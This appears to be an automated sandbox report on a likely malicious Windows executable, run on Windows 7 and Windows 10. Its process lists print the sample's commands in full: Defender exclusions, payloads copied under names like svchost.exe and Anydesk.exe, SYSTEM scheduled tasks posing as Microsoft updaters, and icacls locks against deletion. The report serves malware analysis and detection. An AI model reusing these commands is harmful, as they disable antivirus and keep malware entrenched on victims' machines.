Analysis Overview
SHA256
1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9
Threat Level: Likely malicious
The file 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Modifies file permissions
Checks computer location settings
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Views/modifies file attributes
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-20 22:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 22:59
Reported
2024-06-20 23:02
Platform
win7-20240508-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
Modifies file permissions
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\svchost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\svchost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\conhost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\conhost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\anydesk.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\Windows\system32\taskeng.exe
taskeng.exe {C497B91F-6A43-4058-A890-E23E2564A1EF} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\taskeng.exe
taskeng.exe {30602BE2-B25F-48CC-9724-2B6593B707A8} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
Network
Files
C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat
| MD5 | 71d06b71522b0ecd9e42ee36b73a8976 |
| SHA1 | 5615791d6e861b721e9945d55a0946f4e51d0302 |
| SHA256 | 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0 |
| SHA512 | f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKREIYQYHA5FFTSKC0R8.temp
| MD5 | 9c7ee159aaa9f81e64626f1dd77faee8 |
| SHA1 | 238e19a07b69168e36b84f97a41ec1fb4bf7b934 |
| SHA256 | 543a9dc963592001e404058efb76b87dde2c711445be13a356b27ca2ab6be211 |
| SHA512 | 27d0d34d84207b36c5a553e2cebe5bc2f4b64730b0a3326c3dbe4f4cc5f2b248019554425d961a7de6fa119d48957be1dc062b224c4d9a06ca075568e1fc3c8a |
memory/2596-20-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2596-21-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 22:59
Reported
2024-06-20 23:02
Platform
win10v2004-20240611-en
Max time kernel
144s
Max time network
107s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe | N/A |
Modifies file permissions
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\svchost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\svchost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\conhost.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\conhost.exe" -r -force
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\anydesk.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat
| MD5 | 71d06b71522b0ecd9e42ee36b73a8976 |
| SHA1 | 5615791d6e861b721e9945d55a0946f4e51d0302 |
| SHA256 | 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0 |
| SHA512 | f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84 |
memory/880-2-0x00007FFE70A13000-0x00007FFE70A15000-memory.dmp
memory/880-8-0x000001E129E20000-0x000001E129E42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k31353zv.nsi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/880-13-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
memory/880-14-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
memory/880-17-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3235ed022a42ec4338123ab87144afa |
| SHA1 | 5058608bc0deb720a585a2304a8f7cf63a50a315 |
| SHA256 | 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27 |
